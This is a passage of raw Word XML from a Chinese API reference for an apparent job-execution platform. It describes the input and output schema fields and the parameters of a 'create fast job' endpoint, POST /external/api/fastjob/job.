          <w:p w14:paraId="205FEAE0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4A741AFB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E049E40" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>inputSchemas</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0237D452" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Collection&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>TaskInputSchema</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32D903D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>输入参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7F812206" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="633BE68C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>outputSchemas</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C08811F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Collection&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>TaskOutputSchema</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D4E4A32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>输出参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1803336C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TaskInputSchema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="030A624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DD877CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0478A47B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="234AAE38" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2945792D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4068FFA8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17249CEA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72A46F0F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数字段名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="563080C8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69468E62" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>caption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52D13A0A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FAC75D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3B46611D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DC958CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="506018F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11A9D468" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必须</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="238DE05E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16086C61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>defaultValue</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C328CB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A4D53A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>默认值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="188CEB5C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14E53551" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="383B1C9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EC5E271" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="76281746" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="712DE7E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0925C38A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08CB311F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数示例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B11CE4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TaskOutputSchema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1474"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3C30DA1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523E271" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CB3091A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B71149E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="47C2A9C3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="392ADB4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C2BEEFE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C7C4DD4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="28ED1717" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11F77F79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EE2126E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21E9FF1F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数显示名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6489F0AE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A9B8421" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayOrder</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B28B75D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="540F284D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>显示顺序</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="43A5327F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AE333D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>caption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19482615" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FE9B3D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="62A5EB18" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="338F017D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1038D99A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70009D78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>示例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1238E425" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="385" w:name="_Toc115166265"/>
      <w:bookmarkStart w:id="386" w:name="创建一个快速作业"/>
      <w:bookmarkEnd w:id="384"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>创建一个快速作业</w:t>
      </w:r>
      <w:bookmarkEnd w:id="385"/>
    </w:p>
    <w:p w14:paraId="2B950C8D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100F3E0A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CBBDAE"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341"/>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="4123"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="46F4041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A3890F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="571DCB30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D08D584" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="723890B3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A4CD539" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="109CA568" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64823503" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="09E35A6C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F141058" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FC400C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D5E68B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统类型 1：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>; 2：windows (必填)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6E0310C2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="721087F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F3D31C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69AB5C5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5EF5608F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06A6CC6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47FD4571" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A5DE3B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7B8E59D3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06862492" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6335A79D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C6C232E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业执行范围描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6C96BB48" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F18E3BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18E5E60A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
